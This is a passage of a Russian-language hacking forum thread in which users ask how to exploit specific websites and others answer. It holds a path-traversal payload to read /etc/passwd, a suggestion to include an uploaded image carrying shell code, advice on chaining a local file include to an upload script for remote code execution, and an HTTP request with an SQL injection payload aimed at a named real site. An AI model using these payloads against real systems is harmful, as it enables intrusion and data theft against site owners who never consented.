HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1901  
Старый 10.06.2017, 20:18
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от sepo  
sepo said:

всмысле??
там нету иньекции, там есть ошибка от спец-символа.

логика не срабатывает.

http://www.salaamsombank.com/pages.php?id=(1)
 
Ответить с цитированием

  #1902  
Старый 12.06.2017, 23:59
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию

подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести

file.php?url=site.com%00 на такой запрос выдает ошибку

Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
 
Ответить с цитированием

  #1903  
Старый 13.06.2017, 00:33
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

на сколько я понимаю - url=../../../etc/passwd%00

url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00

при условии, что функция basename() нам ничего не портит.
 
Ответить с цитированием

  #1904  
Старый 13.06.2017, 00:45
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию

file.php?url=../../../etc/passwd%00

Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23
 
Ответить с цитированием

  #1905  
Старый 13.06.2017, 01:23
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

http://www.php.su/functions/?basename

Код:
Code:
то бишь вектор сужается до дириктории, из которой выполняется сценарий.
 
Ответить с цитированием

  #1906  
Старый 13.06.2017, 01:34
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от swat_  
swat_ said:

подскажите пожалуйста есть ли в этом коде уязвимость
Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.

Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:

Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.phpпроверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее
 
Ответить с цитированием

  #1907  
Старый 13.06.2017, 16:30
IvanPa
Guest
Сообщений: n/a
Провел на форуме:
390

Репутация: 0
По умолчанию

всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?
 
Ответить с цитированием

  #1908  
Старый 13.06.2017, 17:55
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от IvanPa  
IvanPa said:

всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?
Для начала скажите какую платформу вы используете.

В зависимости от этого можно будет обрисовать потенциальные уязвимости.

Опаснотсть представляют не чаты, опасность представляют упущения в коде.

А за небольшую сумму проведу black box + white box аудит с подробным отчетом.
 
Ответить с цитированием

  #1909  
Старый 13.06.2017, 19:33
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Что можно сделать тут?

Код:
Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092
 
Ответить с цитированием

  #1910  
Старый 13.06.2017, 23:13
ACat
Guest
Сообщений: n/a
Провел на форуме:
60408

Репутация: 0
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:

Что можно сделать тут?
Код:
Code:
http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092
SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1

Host: www.rapibus.sto.ca

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Cookie:

Connection: close

Content-Length: 0
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ